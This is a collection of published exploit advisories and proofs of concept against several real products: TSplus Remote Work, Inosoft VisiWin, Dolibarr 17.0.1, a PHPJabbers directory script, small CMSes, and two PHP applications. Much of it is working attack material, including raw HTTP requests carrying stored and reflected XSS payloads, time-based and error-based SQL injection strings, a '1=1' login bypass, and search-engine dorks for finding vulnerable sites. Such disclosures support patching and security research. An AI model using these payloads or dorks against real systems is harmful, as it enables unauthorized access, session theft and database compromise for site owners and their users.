<pre><code># Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://tsplus.net/<br /># Version: Up to 16.0.0.0<br /># Tested on: Windows<br /># CVE : CVE-2023-31068<br /><br />With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single <br />sign-on web portal and remote desktop gateway that enables users to <br />remotely access the console session of their office PC.<br />The solution comes with an embedded web server to allow remote users to <br />easely connect remotely.<br />However, insecure file and folder permissions are set, and this could <br />allow a malicious user to manipulate file content (e.g.: changing the <br />code of html pages or js scripts) or change legitimate files (e.g. <br />Setup-RemoteWork-Client.exe) in order to compromise a system or to gain <br />elevated privileges.<br /><br />This is the list of insecure files and folders with their respective <br />permissions:<br /><br />Permission: Everyone:(OI)(CI)(F)<br /><br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\locales<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log<br /><br />-------------------------------------------------------------------------------------------<br /><br />Permission: Everyone:(F)<br /><br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js<br />C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\index.html<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js<br />C:\Program Files <br />(x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js<br /><br /></code></pre>
<pre><code># Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://tsplus.net/<br /># Version: Up to 16.0.0.0<br /># Tested on: Windows<br /># CVE : CVE-2023-31069<br /><br />With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single <br />sign-on web portal and remote desktop gateway that enables users to <br />remotely access the console session of their office PC.<br />It is possible to create a custom web portal login page which allows a <br />user to login without providing their credentials.<br />However, the credentials are stored in an insecure manner since they are <br />saved in cleartext, within the html login page.<br />This means that everyone with an access to the web login page, can <br />easely retrieve the credentials to access to the application by simply <br />looking at the html code page.<br /><br />This is a code snippet extracted by the source code of the login page <br />(var user and var pass):<br /><br /> // --------------- Access Configuration ---------------<br /> var user = "Admin"; // Login to use when <br />connecting to the remote server (leave "" to use the login typed in this <br />page)<br /> var pass = "SuperSecretPassword"; // Password to use when <br />connecting to the remote server (leave "" to use the password typed in <br />this page)<br /> var domain = ""; // Domain to use when <br />connecting to the remote server (leave "" to use the domain typed in <br />this page)<br /> var server = "127.0.0.1"; // Server to connect to <br />(leave "" to use localhost and/or the server chosen in this page)<br /> var port = ""; // Port to connect to <br />(leave "" to use localhost and/or the port of the server chosen in this <br />page)<br /> var lang = "as_browser"; // Language to use<br /> var serverhtml5 = "127.0.0.1"; // Server to connect to, <br />when using HTML5 client<br /> var porthtml5 = "3389"; // Port to connect to, <br />when using HTML5 client<br /> var cmdline = ""; // Optional text that will <br />be put in the server's clipboard once connected<br /> // --------------- End of Access Configuration ---------------<br /><br /></code></pre>
<pre><code># Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions <br />Privilege Escalation<br /># Date: 2023-08-09<br /># Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia<br /># Vendor Homepage: https://www.inosoft.com/<br /># Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5)<br /># Tested on: Windows<br /># CVE: CVE-2023-31468<br /><br />Inosoft VisiWin is a completely open system with a configurable range of <br />functions. It combines all features of classic HMI software with <br />unlimited programming possibilities.<br />The installation of the solution will create insecure folder, and this <br />could allow a malicious user to manipulate file content or change <br />legitimate files (e.g., VisiWin7.Server.Manager.exe which runs with <br />SYSTEM privileges) to compromise a system or to gain elevated <br />privileges.<br /><br />This is the list of insecure files and folders with their respective <br />permissions:<br /><br />C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH"<br />C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)<br /> Everyone:(OI)(CI)(F)<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(F)<br /><br />Successfully processed 1 files; Failed processing 0 files<br /><br />C:\><br /><br />--------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe"<br />C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)<br /> <br /> Everyone:(I)(F)<br /> <br /> NT AUTHORITY\SYSTEM:(I)(F)<br /><br />Successfully processed 1 files; Failed processing 0 files<br /><br />C:\><br /><br /></code></pre>
<pre><code># Exploit Title: Dolibarr Version 17.0.1 - Stored XSS<br /># Dork: <br /># Date: 2023-08-09<br /># Exploit Author: Furkan Karaarslan<br /># Category : Webapps<br /># Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php<br /># Version: 17.0.1 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : <br /><br />-----------------------------------------------------------------------------<br />Requests<br /><br />POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 599<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht<br />Connection: close<br /><br />token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir<br /><br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities<br /># Date: 09/08/2023<br /># Exploit Author: Kerimcan Ozturk<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/business-directory-script/<br /># Version: 3.2<br /># Tested on: Windows 10 Pro<br />## Description<br /><br />Technical Detail / POC<br />==========================<br />Login Account<br />Go to Property Page (<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)<br />Edit Any Property (<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57<br />)<br /><br />[1] Cross-Site Scripting (XSS)<br /><br />Request:<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=<br />"<script><image/src/onerror=prompt(8)><br /><br />[2] Cross-Site Request Forgery<br /><br />Request:<br />https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=<br />"<script><font%20color="green">Kerimcan%20Ozturk</font><br /><br />Best Regards<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : FOG Forum v0.8 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://fogproject.org/ |<br />| # Dork : Powered by FOG Forum 0.8 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] This vulnerability affects : /forum/fen.php. <br /><br />[+] Attack details :<br /><br /> URI was set to ;904045'():;984994<br /> The input is reflected inside <script> tag between single quotes.<br /><br />[+] This vulnerability affects /forum/index.php. <br /> <br />[+] Attack details :<br /><br /> URL encoded GET input fog_action was set to 1" onmouseover=prompt(984696) bad="<br /> The input is reflected inside a tag parameter between double quotes.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : FoccusWeb CMS v0.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://www.foccusweb.com/site/ | <br />======================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /resultados.html?txt-busca=1<script>alert(/indoushka/);</script>&yt0=submit<br /><br />[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submit<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Fluent CMS V 1.0.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 77.0.1(32-bit) | <br />| # Vendor : http://www.fluenttechnology.com/ | <br />| # Dork : "Developed By - Fluent Technology" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : User & Pass : 1' or 1=1 -- -<br /><br />[+] admin Panel : /fluentcms/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Color Prediction Game v1.0 - SQL Injection<br /># Date: 2023-08-12<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script<br /># Tested on: Kali Linux & MacOS<br /># CVE: N/A<br /><br />### Request ###<br /><br />POST /loginNow.php HTTP/1.1<br />Host: localhost<br />Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)<br />Gecko/20100101 Firefox/116.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------395879129218961020344050490865<br />Content-Length: 434<br />Origin: http://localhost<br />Referer: http://localhost/login.php<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_mobile"<br />4334343433<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_password"<br />123456<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="action"<br />login<br />-----------------------------395879129218961020344050490865--<br /><br />### Parameter & Payloads ###<br />Parameter: MULTIPART login_mobile ((custom) POST)<br />Type: time-based blind<br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />Payload: -----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_mobile"<br />4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_password"<br />123456<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="action"<br />login<br />-----------------------------395879129218961020344050490865--<br /><br /></code></pre>
<pre><code># Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection<br /># Date: 2023-08-12<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378<br /># Tested on: Kali Linux & MacOS<br /># CVE: N/A<br /><br />### Request ###<br />POST /report/balance HTTP/1.1<br />Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />Referer: http://localhost<br />Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f<br />Content-Length: 472<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="school_id"<br />0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z<br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="academic_year_id"<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="group_by"<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_from"<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_to"<br /><br />------------YWJkMTQzNDcw--<br /><br />### Parameter & Payloads ###<br />Parameter: MULTIPART school_id ((custom) POST)<br />Type: error-based<br />Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY<br />clause (EXTRACTVALUE)<br />Payload: ------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="school_id"<br />0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND<br />EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT<br />(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx<br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="academic_year_id"<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="group_by"<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_from"<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_to"<br /><br />------------YWJkMTQzNDcw–<br /><br /></code></pre>
